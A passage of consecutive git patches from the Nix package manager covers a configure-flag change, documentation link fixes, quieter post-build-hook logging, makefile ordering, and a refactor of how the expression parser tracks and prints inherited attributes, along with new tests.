1fe7b016699c4e2a7435ba29d1ecc6830ae88946 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Fri, 9 Feb 2024 06:27:24 +0100 Subject: [PATCH 431/654] Don't hardcode the `-O2` compiler flag autoconf authors apparently decided that setting `-O2` by default was a good idea. I disagree, and Nix has its own way of deciding that (with `OPTIMIZE={0,1}`). Explicitly set `CFLAGS` and `CXXFLAGS` in the configure script to disable that behaviour. Fix #9965 --- configure.ac | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/configure.ac b/configure.ac index 8c29c1e62..676b145a5 100644 --- a/configure.ac +++ b/configure.ac @@ -47,6 +47,10 @@ AC_DEFINE_UNQUOTED(SYSTEM, ["$system"], [platform identifier ('cpu-os')]) # State should be stored in /nix/var, unless the user overrides it explicitly. test "$localstatedir" = '${prefix}/var' && localstatedir=/nix/var +# Assign a default value to C{,XX}FLAGS as the default configure script sets them +# to -O2 otherwise, which we don't want to have hardcoded +CFLAGS=${CFLAGS-""} +CXXFLAGS=${CXXFLAGS-""} AC_PROG_CC AC_PROG_CXX From 60045f9c9650ae87f04a2fe507817ad9b5318104 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 9 Feb 2024 10:41:03 +0100 Subject: [PATCH 432/654] add clickable anchor links how the different invocations relate to each other seems be confusing, which is relatable because one has to wire it up in your head while reading. an explicit reference should make it unambiguous and easier to notice due to links being highlighted. --- doc/manual/src/command-ref/nix-collect-garbage.md | 2 +- doc/manual/src/command-ref/nix-env/delete-generations.md | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/doc/manual/src/command-ref/nix-collect-garbage.md b/doc/manual/src/command-ref/nix-collect-garbage.md index 3cab79f0e..1bc88d858 100644 --- a/doc/manual/src/command-ref/nix-collect-garbage.md +++ b/doc/manual/src/command-ref/nix-collect-garbage.md @@ -51,7 +51,7 @@ These options are for deleting old [profiles] prior to deleting unreachable [sto - [`--delete-old`](#opt-delete-old) / `-d`\ Delete all old generations of profiles. - This is the equivalent of invoking `nix-env --delete-generations old` on each found profile. + This is the equivalent of invoking [`nix-env --delete-generations old`](@docroot@/command-ref/nix-env/delete-generations.md#generations-old) on each found profile. - [`--delete-older-than`](#opt-delete-older-than) *period*\ Delete all generations of profiles older than the specified amount (except for the generations that were active at that point in time). diff --git a/doc/manual/src/command-ref/nix-env/delete-generations.md b/doc/manual/src/command-ref/nix-env/delete-generations.md index adc6fc219..6b6ea798e 100644 --- a/doc/manual/src/command-ref/nix-env/delete-generations.md +++ b/doc/manual/src/command-ref/nix-env/delete-generations.md @@ -12,13 +12,13 @@ This operation deletes the specified generations of the current profile. *generations* can be a one of the following: -- `...`:\ +- [`...`](#generations-list):\ A list of generation numbers, each one a separate command-line argument. Delete exactly the profile generations given by their generation number. Deleting the current generation is not allowed. -- The special value `old` +- [The special value `old`](#generations-old) Delete all generations except the current one. @@ -30,7 +30,7 @@ This operation deletes the specified generations of the current profile. > Because one can roll back to a previous generation, it is possible to have generations newer than the current one. > They will also be deleted. -- `d`:\ +- [`d`](#generations-time):\ The last *number* days *Example*: `30d` @@ -38,7 +38,7 @@ This operation deletes the specified generations of the current profile. Delete all generations created more than *number* days ago, except the most recent one of them. This allows rolling back to generations that were available within the specified period. -- `+`:\ +- [`+`](#generations-count):\ The last *number* generations up to the present *Example*: `+5` From fb5a792280a55bf783528f0903204e674417c70a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 9 Feb 2024 15:55:24 +0100 Subject: [PATCH 433/654] runPostBuildHook(): Be less chatty Don't spam the user with "running post-build-hook" messages. It's up to the post-build hook if it has something interesting to say. --- src/libstore/build/derivation-goal.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index d3bbdf1ed..1b326ee13 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -891,7 +891,7 @@ void runPostBuildHook( if (hook == "") return; - Activity act(logger, lvlInfo, actPostBuildHook, + Activity act(logger, lvlTalkative, actPostBuildHook, fmt("running post-build-hook '%s'", settings.postBuildHook), Logger::Fields{store.printStorePath(drvPath)}); PushActivity pact(act.id); From 8f3253c6f4041f500631e1dac5ba75f335e9c70a Mon Sep 17 00:00:00 2001 From: Alois Wohlschlager Date: Fri, 9 Feb 2024 18:56:42 +0100 Subject: [PATCH 434/654] Restore manual pages Commit d536c57e878a04f795c1ef8ee3232a47035da2cf inadvertedly broke build and installation of all non-autogenerated manual pages (in particular, all the ones documenting the stable CLI), by moving the definition of the man-pages variable in doc/manual/local.mk after its usage in mk/lib.mk. Move including the former earlier so that the correct order is restored. --- Makefile | 25 ++++++++++++++----------- mk/lib.mk | 4 ++++ 2 files changed, 18 insertions(+), 11 deletions(-) diff --git a/Makefile b/Makefile index 7bbfbddbe..d3542c3e9 100644 --- a/Makefile +++ b/Makefile @@ -47,6 +47,17 @@ makefiles += \ tests/functional/plugins/local.mk endif +# Some makefiles require access to built programs and must be included late. +makefiles-late = + +ifeq ($(ENABLE_DOC_GEN), yes) +makefiles-late += doc/manual/local.mk +endif + +ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) +makefiles-late += doc/internal-api/local.mk +endif + # Miscellaneous global Flags OPTIMIZE = 1 @@ -95,24 +106,16 @@ installcheck: @exit 1 endif -# Documentation or else fallback stub rules. -# -# The documentation makefiles be included after `mk/lib.mk` so rules -# refer to variables defined by `mk/lib.mk`. Rules are not "lazy" like -# variables, unfortunately. +# Documentation fallback stub rules. -ifeq ($(ENABLE_DOC_GEN), yes) -$(eval $(call include-sub-makefile, doc/manual/local.mk)) -else +ifneq ($(ENABLE_DOC_GEN), yes) .PHONY: manual-html manpages manual-html manpages: @echo "Generated docs are disabled. Configure without '--disable-doc-gen', or avoid calling 'make manpages' and 'make manual-html'." @exit 1 endif -ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) -$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) -else +ifneq ($(ENABLE_INTERNAL_API_DOCS), yes) .PHONY: internal-api-html internal-api-html: @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." diff --git a/mk/lib.mk b/mk/lib.mk index 10ce8d436..fe0add1c9 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -97,6 +97,10 @@ $(foreach test-group, $(install-tests-groups), \ $(eval $(call run-test,$(test),$(install_test_init))) \ $(eval $(test-group).test-group: $(test).test))) +# Include makefiles requiring built programs. +$(foreach mf, $(makefiles-late), $(eval $(call include-sub-makefile,$(mf)))) + + $(foreach file, $(man-pages), $(eval $(call install-data-in, $(file), $(mandir)/man$(patsubst .%,%,$(suffix $(file)))))) From 53eecae52546219f3f3e7bebac9792ea5d816ffc Mon Sep 17 00:00:00 2001 From: BOHverkill Date: Sat, 10 Feb 2024 17:17:48 +0100 Subject: [PATCH 435/654] Fix link to derivation in string interpolation doc The reference link definition for it pointing to the glossary was removed, so it is currently not displayed as a link. --- doc/manual/src/language/string-interpolation.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index 6e28d2664..7d81c2020 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -20,6 +20,8 @@ Rather than writing (where `freetype` is a [derivation]), you can instead write +[derivation]: ../glossary.md#gloss-derivation + ```nix "--with-freetype2-library=${freetype}/lib" ``` From fae8c15737a8a1df85cc75f55c0bffa712b9ac0a Mon Sep 17 00:00:00 2001 From: BOHverkill Date: Sat, 10 Feb 2024 17:44:33 +0100 Subject: [PATCH 436/654] Fix link to manual in CONTRIBUTING.md --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ffcc0268f..a0c2b16f4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -63,7 +63,7 @@ Check out the [security policy](https://github.com/NixOS/nix/security/policy). - Functional tests – [`tests/functional/**.sh`](./tests/functional) - Unit tests – [`src/*/tests`](./src/) - Integration tests – [`tests/nixos/*`](./tests/nixos) - - [ ] User documentation in the [manual](..doc/manual/src) + - [ ] User documentation in the [manual](./doc/manual/src) - [ ] API documentation in header files - [ ] Code and comments are self-explanatory - [ ] Commit message explains **why** the change was made From f298159a2bac2932208907f6319a0ba80b2721c6 Mon Sep 17 00:00:00 2001 From: nbelakovski Date: Sat, 10 Feb 2024 18:52:39 -0800 Subject: [PATCH 437/654] Add a note about lists values.md There's probably more that can be said, but I thought it might be helpful to put something here about how to access elements of a list for folks coming from more or less any other programming language. If this is rarely used, it might be nice to add to the documentation something about why it's rarely used. --- doc/manual/src/language/values.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/src/language/values.md b/doc/manual/src/language/values.md index aea68a441..99dc0245d 100644 --- a/doc/manual/src/language/values.md +++ b/doc/manual/src/language/values.md @@ -156,6 +156,8 @@ function and the fifth being a set. Note that lists are only lazy in values, and they are strict in length. +Elements in a list can be accessed using `builtins.elemAt`. + ## Attribute Set An attribute set is a collection of name-value-pairs (called *attributes*) enclosed in curly brackets (`{ }`). From 4496a4537b56d69c7227088c4174a1ecbedd2ed5 Mon Sep 17 00:00:00 2001 From: nbelakovski Date: Sun, 11 Feb 2024 22:52:49 -0800 Subject: [PATCH 438/654] Update values.md Link to elemAt --- doc/manual/src/language/values.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/language/values.md b/doc/manual/src/language/values.md index 99dc0245d..74ffc7070 100644 --- a/doc/manual/src/language/values.md +++ b/doc/manual/src/language/values.md @@ -156,7 +156,7 @@ function and the fifth being a set. Note that lists are only lazy in values, and they are strict in length. -Elements in a list can be accessed using `builtins.elemAt`. +Elements in a list can be accessed using [`builtins.elemAt`](./builtins.md#builtins-elemAt). ## Attribute Set From 8669c02468994887be91072ac58b1ee43380d354 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 439/654] add test for inherit-from semantics --- tests/functional/lang/eval-okay-inherit-from.err.exp | 2 ++ tests/functional/lang/eval-okay-inherit-from.exp | 1 + tests/functional/lang/eval-okay-inherit-from.nix | 6 ++++++ 3 files changed, 9 insertions(+) create mode 100644 tests/functional/lang/eval-okay-inherit-from.err.exp create mode 100644 tests/functional/lang/eval-okay-inherit-from.exp create mode 100644 tests/functional/lang/eval-okay-inherit-from.nix diff --git a/tests/functional/lang/eval-okay-inherit-from.err.exp b/tests/functional/lang/eval-okay-inherit-from.err.exp new file mode 100644 index 000000000..51881205b --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.err.exp @@ -0,0 +1,2 @@ +trace: used +trace: used diff --git a/tests/functional/lang/eval-okay-inherit-from.exp b/tests/functional/lang/eval-okay-inherit-from.exp new file mode 100644 index 000000000..43bd0e899 --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.exp @@ -0,0 +1 @@ +[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; } ] diff --git a/tests/functional/lang/eval-okay-inherit-from.nix b/tests/functional/lang/eval-okay-inherit-from.nix new file mode 100644 index 000000000..d1fad7d69 --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.nix @@ -0,0 +1,6 @@ +let + inherit (builtins.trace "used" { a = 1; b = 2; }) a b; + x.c = 3; + y.d = 4; +in + [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } ] From 73065a400d176b21f518c1f4ece90c31318b218d Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 440/654] add test for inherit expr printing --- tests/functional/lang/parse-okay-inherits.exp | 1 + tests/functional/lang/parse-okay-inherits.nix | 9 +++++++++ 2 files changed, 10 insertions(+) create mode 100644 tests/functional/lang/parse-okay-inherits.exp create mode 100644 tests/functional/lang/parse-okay-inherits.nix diff --git a/tests/functional/lang/parse-okay-inherits.exp b/tests/functional/lang/parse-okay-inherits.exp new file mode 100644 index 000000000..050b54afd --- /dev/null +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -0,0 +1 @@ +(let c = { }; b = 2; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) diff --git a/tests/functional/lang/parse-okay-inherits.nix b/tests/functional/lang/parse-okay-inherits.nix new file mode 100644 index 000000000..10596c8ad --- /dev/null +++ b/tests/functional/lang/parse-okay-inherits.nix @@ -0,0 +1,9 @@ +let + c = {}; + b = 2; +in { + a = 1; + inherit b; + inherit (c) d e; + f = 3; +} From c66ee57edc6cac3571bfbf77d0c0ea4d25b4e805 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 441/654] preserve information about whether/how an attribute was inherited --- src/libexpr/eval.cc | 6 +++--- src/libexpr/nixexpr.cc | 8 ++++---- src/libexpr/nixexpr.hh | 17 ++++++++++++++--- src/libexpr/parser-state.hh | 2 +- src/libexpr/parser.y | 11 +++++++++-- 5 files changed, 31 insertions(+), 13 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index bffbd5f1a..12d7d825f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1207,11 +1207,11 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) Displacement displ = 0; for (auto & i : attrs) { Value * vAttr; - if (hasOverrides && !i.second.inherited) { + if (hasOverrides && !i.second.inherited()) { vAttr = state.allocValue(); mkThunk(*vAttr, env2, i.second.e); } else - vAttr = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + vAttr = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); env2.values[displ++] = vAttr; v.attrs->push_back(Attr(i.first, vAttr, i.second.pos)); } @@ -1282,7 +1282,7 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) environment. */ Displacement displ = 0; for (auto & i : attrs->attrs) - env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); auto dts = state.debugRepl ? makeDebugTraceStacker( diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 46737fea6..4c06864fd 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -82,7 +82,7 @@ void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const return sa < sb; }); for (auto & i : sorted) { - if (i->second.inherited) + if (i->second.inherited()) str << "inherit " << symbols[i->first] << " " << "; "; else { str << symbols[i->first] << " = "; @@ -153,7 +153,7 @@ void ExprLet::show(const SymbolTable & symbols, std::ostream & str) const { str << "(let "; for (auto & i : attrs->attrs) - if (i.second.inherited) { + if (i.second.inherited()) { str << "inherit " << symbols[i.first] << "; "; } else { @@ -343,7 +343,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr // No need to sort newEnv since attrs is in sorted order. for (auto & i : attrs) - i.second.e->bindVars(es, i.second.inherited ? env : newEnv); + i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, newEnv); @@ -418,7 +418,7 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & // No need to sort newEnv since attrs->attrs is in sorted order. for (auto & i : attrs->attrs) - i.second.e->bindVars(es, i.second.inherited ? env : newEnv); + i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, newEnv)); diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1f944f10b..c8f47b02b 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -160,13 +160,24 @@ struct ExprAttrs : Expr bool recursive; PosIdx pos; struct AttrDef { - bool inherited; + enum class Kind { + /** `attr = expr;` */ + Plain, + /** `inherit attr1 attrn;` */ + Inherited, + /** `inherit (expr) attr1 attrn;` */ + InheritedFrom, + }; + + Kind kind; Expr * e; PosIdx pos; Displacement displ; // displacement - AttrDef(Expr * e, const PosIdx & pos, bool inherited=false) - : inherited(inherited), e(e), pos(pos) { }; + AttrDef(Expr * e, const PosIdx & pos, Kind kind = Kind::Plain) + : kind(kind), e(e), pos(pos) { }; AttrDef() { }; + + bool inherited() const { return kind == Kind::Inherited; } }; typedef std::map AttrDefs; AttrDefs attrs; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 87aeaeef5..ae38de130 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -89,7 +89,7 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * if (i->symbol) { ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); if (j != attrs->attrs.end()) { - if (!j->second.inherited) { + if (!j->second.inherited()) { ExprAttrs * attrs2 = dynamic_cast(j->second.e); if (!attrs2) dupAttr(attrPath, pos, j->second.pos); attrs = attrs2; diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index a3ba13c66..0898b81f7 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -313,7 +313,9 @@ binds if ($$->attrs.find(i.symbol) != $$->attrs.end()) state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos); auto pos = state->at(@3); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); + $$->attrs.emplace( + i.symbol, + ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited)); } delete $3; } @@ -323,7 +325,12 @@ binds for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->at(@6))); + $$->attrs.emplace( + i.symbol, + ExprAttrs::AttrDef( + new ExprSelect(CUR_POS, $4, i.symbol), + state->at(@6), + ExprAttrs::AttrDef::Kind::InheritedFrom)); } delete $6; } From 1f542adb3e18e7078e6a589182a53a47d971748a Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 442/654] add ExprAttrs::AttrDef::chooseByKind MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit in place of inherited() — not quite useful yet since we don't distinguish plain and inheritFrom attr kinds so far. --- src/libexpr/eval.cc | 22 +++++++++++++++------- src/libexpr/nixexpr.cc | 28 +++++++++++++++++----------- src/libexpr/nixexpr.hh | 14 ++++++++++++++ 3 files changed, 46 insertions(+), 18 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 12d7d825f..91341e167 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1209,9 +1209,9 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) Value * vAttr; if (hasOverrides && !i.second.inherited()) { vAttr = state.allocValue(); - mkThunk(*vAttr, env2, i.second.e); + mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, &env2), i.second.e); } else - vAttr = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); + vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, &env2)); env2.values[displ++] = vAttr; v.attrs->push_back(Attr(i.first, vAttr, i.second.pos)); } @@ -1243,9 +1243,14 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) } } - else - for (auto & i : attrs) - v.attrs->push_back(Attr(i.first, i.second.e->maybeThunk(state, env), i.second.pos)); + else { + for (auto & i : attrs) { + v.attrs->push_back(Attr( + i.first, + i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, &env)), + i.second.pos)); + } + } /* Dynamic attrs apply *after* rec and __overrides. */ for (auto & i : dynamicAttrs) { @@ -1281,8 +1286,11 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) while the inherited attributes are evaluated in the original environment. */ Displacement displ = 0; - for (auto & i : attrs->attrs) - env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); + for (auto & i : attrs->attrs) { + env2.values[displ++] = i.second.e->maybeThunk( + state, + *i.second.chooseByKind(&env2, &env, &env2)); + } auto dts = state.debugRepl ? makeDebugTraceStacker( diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 4c06864fd..f967777f2 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -334,16 +334,19 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); if (recursive) { - auto newEnv = std::make_shared(nullptr, env.get(), recursive ? attrs.size() : 0); + auto newEnv = [&] () -> std::shared_ptr { + auto newEnv = std::make_shared(nullptr, env.get(), attrs.size()); - Displacement displ = 0; - for (auto & i : attrs) - newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + Displacement displ = 0; + for (auto & i : attrs) + newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + return newEnv; + }(); // No need to sort newEnv since attrs is in sorted order. for (auto & i : attrs) - i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); + i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv)); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, newEnv); @@ -352,7 +355,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr } else { for (auto & i : attrs) - i.second.e->bindVars(es, env); + i.second.e->bindVars(es, i.second.chooseByKind(env, env, env)); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, env); @@ -409,16 +412,19 @@ void ExprCall::bindVars(EvalState & es, const std::shared_ptr & void ExprLet::bindVars(EvalState & es, const std::shared_ptr & env) { - auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); + auto newEnv = [&] () -> std::shared_ptr { + auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); - Displacement displ = 0; - for (auto & i : attrs->attrs) - newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + Displacement displ = 0; + for (auto & i : attrs->attrs) + newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + return newEnv; + }(); // No need to sort newEnv since attrs->attrs is in sorted order. for (auto & i : attrs->attrs) - i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); + i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv)); if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, newEnv)); diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index c8f47b02b..2d8dafe44 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -178,6 +178,20 @@ struct ExprAttrs : Expr AttrDef() { }; bool inherited() const { return kind == Kind::Inherited; } + + template + const T & chooseByKind(const T & plain, const T & inherited, const T & inheritedFrom) const + { + switch (kind) { + case Kind::Plain: + return plain; + case Kind::Inherited: + return inherited; + default: + case Kind::InheritedFrom: + return inheritedFrom; + } + } }; typedef std::map AttrDefs; AttrDefs attrs; From 6c08fba533ef31cad2bdc03ba72ecf58dc8ee5a0 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 443/654] use the same bindings print for ExprAttrs and ExprLet this also has the effect of sorting let bindings lexicographically rather than by symbol creation order as was previously done, giving a better canonicalization in the process. --- src/libexpr/nixexpr.cc | 21 ++++++++----------- src/libexpr/nixexpr.hh | 2 ++ tests/functional/lang/parse-okay-inherits.exp | 2 +- 3 files changed, 12 insertions(+), 13 deletions(-) diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index f967777f2..c0812bb30 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -70,10 +70,8 @@ void ExprOpHasAttr::show(const SymbolTable & symbols, std::ostream & str) const str << ") ? " << showAttrPath(symbols, attrPath) << ")"; } -void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const +void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) const { - if (recursive) str << "rec "; - str << "{ "; typedef const decltype(attrs)::value_type * Attr; std::vector sorted; for (auto & i : attrs) sorted.push_back(&i); @@ -97,6 +95,13 @@ void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const i.valueExpr->show(symbols, str); str << "; "; } +} + +void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const +{ + if (recursive) str << "rec "; + str << "{ "; + showBindings(symbols, str); str << "}"; } @@ -152,15 +157,7 @@ void ExprCall::show(const SymbolTable & symbols, std::ostream & str) const void ExprLet::show(const SymbolTable & symbols, std::ostream & str) const { str << "(let "; - for (auto & i : attrs->attrs) - if (i.second.inherited()) { - str << "inherit " << symbols[i.first] << "; "; - } - else { - str << symbols[i.first] << " = "; - i.second.e->show(symbols, str); - str << "; "; - } + attrs->showBindings(symbols, str); str << "in "; body->show(symbols, str); str << ")"; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 2d8dafe44..4a93143b4 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -207,6 +207,8 @@ struct ExprAttrs : Expr ExprAttrs() : recursive(false) { }; PosIdx getPos() const override { return pos; } COMMON_METHODS + + void showBindings(const SymbolTable & symbols, std::ostream & str) const; }; struct ExprList : Expr diff --git a/tests/functional/lang/parse-okay-inherits.exp b/tests/functional/lang/parse-okay-inherits.exp index 050b54afd..722101ceb 100644 --- a/tests/functional/lang/parse-okay-inherits.exp +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -1 +1 @@ -(let c = { }; b = 2; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) +(let b = 2; c = { }; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) From ecf8b12d60ad2929f9998666cf0966475b91e291 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 444/654] group inherit by source during Expr::show for plain inherits this is really just a stylistic choice, but for inherit-from it actually fixes an exponential size increase problem during expr printing (as may happen during assertion failure reporting, on during duplicate attr detection in the parser) --- src/libexpr/nixexpr.cc | 32 +++++++++++++++++-- tests/functional/lang/parse-okay-inherits.exp | 2 +- .../functional/lang/parse-okay-subversion.exp | 2 +- 3 files changed, 31 insertions(+), 5 deletions(-) diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index c0812bb30..82e69de51 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -79,10 +79,36 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co std::string_view sa = symbols[a->first], sb = symbols[b->first]; return sa < sb; }); + std::vector inherits; + std::map> inheritsFrom; for (auto & i : sorted) { - if (i->second.inherited()) - str << "inherit " << symbols[i->first] << " " << "; "; - else { + switch (i->second.kind) { + case AttrDef::Kind::Plain: + break; + case AttrDef::Kind::Inherited: + inherits.push_back(i->first); + break; + case AttrDef::Kind::InheritedFrom: { + auto & select = dynamic_cast(*i->second.e); + inheritsFrom[select.e].push_back(i->first); + break; + } + } + } + if (!inherits.empty()) { + str << "inherit"; + for (auto sym : inherits) str << " " << symbols[sym]; + str << "; "; + } + for (const auto & [from, syms] : inheritsFrom) { + str << "inherit ("; + from->show(symbols, str); + str << ")"; + for (auto sym : syms) str << " " << symbols[sym]; + str << "; "; + } + for (auto & i : sorted) { + if (i->second.kind == AttrDef::Kind::Plain) { str << symbols[i->first] << " = "; i->second.e->show(symbols, str); str << "; "; diff --git a/tests/functional/lang/parse-okay-inherits.exp b/tests/functional/lang/parse-okay-inherits.exp index 722101ceb..1355527e6 100644 --- a/tests/functional/lang/parse-okay-inherits.exp +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -1 +1 @@ -(let b = 2; c = { }; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) +(let b = 2; c = { }; in { inherit b; inherit (c) d e; a = 1; f = 3; }) diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp index 4168ee8bf..2303932c4 100644 --- a/tests/functional/lang/parse-okay-subversion.exp +++ b/tests/functional/lang/parse-okay-subversion.exp @@ -1 +1 @@ -({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { builder = /foo/bar; db4 = (if localServer then db4 else null); inherit expat ; inherit httpServer ; httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); inherit javaSwigBindings ; inherit javahlBindings ; inherit localServer ; name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if 